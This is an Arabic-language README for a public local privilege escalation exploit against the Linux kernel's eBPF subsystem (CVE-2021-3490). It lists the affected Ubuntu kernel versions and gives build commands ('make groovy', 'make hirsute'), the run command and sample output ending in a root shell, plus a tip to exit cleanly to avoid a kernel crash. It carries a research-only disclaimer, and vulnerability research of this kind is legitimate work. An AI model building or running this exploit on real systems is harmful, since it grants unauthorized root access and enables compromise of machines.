
استغلال تصعيد الامتيازات المحلية لنواة Linux المعتمد على eBPF والذي يستهدف CVE-2021-3490. يوفر وصول شل الجذر على نوى Ubuntu الضعيفة من 5.8.0-25 إلى 5.11.0-16.
استغلال LPE لـ CVE-2021-3490. تم اختباره على أنوية Ubuntu 20.04.02 و 20.10 (Groovy Gorilla) من الإصدار 5.8.0-25.26 حتى 5.8.0-52.58. و Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. تم اكتشاف الثغرة بواسطة Manfred Paul @_manfp وتم إصلاحها في هذا الالتزام.
المؤلف: @chompie1337
لأغراض تعليمية/بحثية فقط. استخدمه على مسؤوليتك الخاصة.
للبناء من أجل Ubuntu 20.04.02 و Ubuntu 20.10 (Groovy Gorilla):
make groovy
للبناء من أجل Ubuntu 21.04 (Hirsute Hippo):
make hirsute
للتشغيل:
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#
ملاحظة: يجب بالضرورة الخروج بشكل نظيف من الصلبة الجذر عن طريق كتابة exit لتنفيذ التنظيف وتجنب تعطل النواة.
اطلع على الشرح Kernel Pwning with eBPF: a Love Story.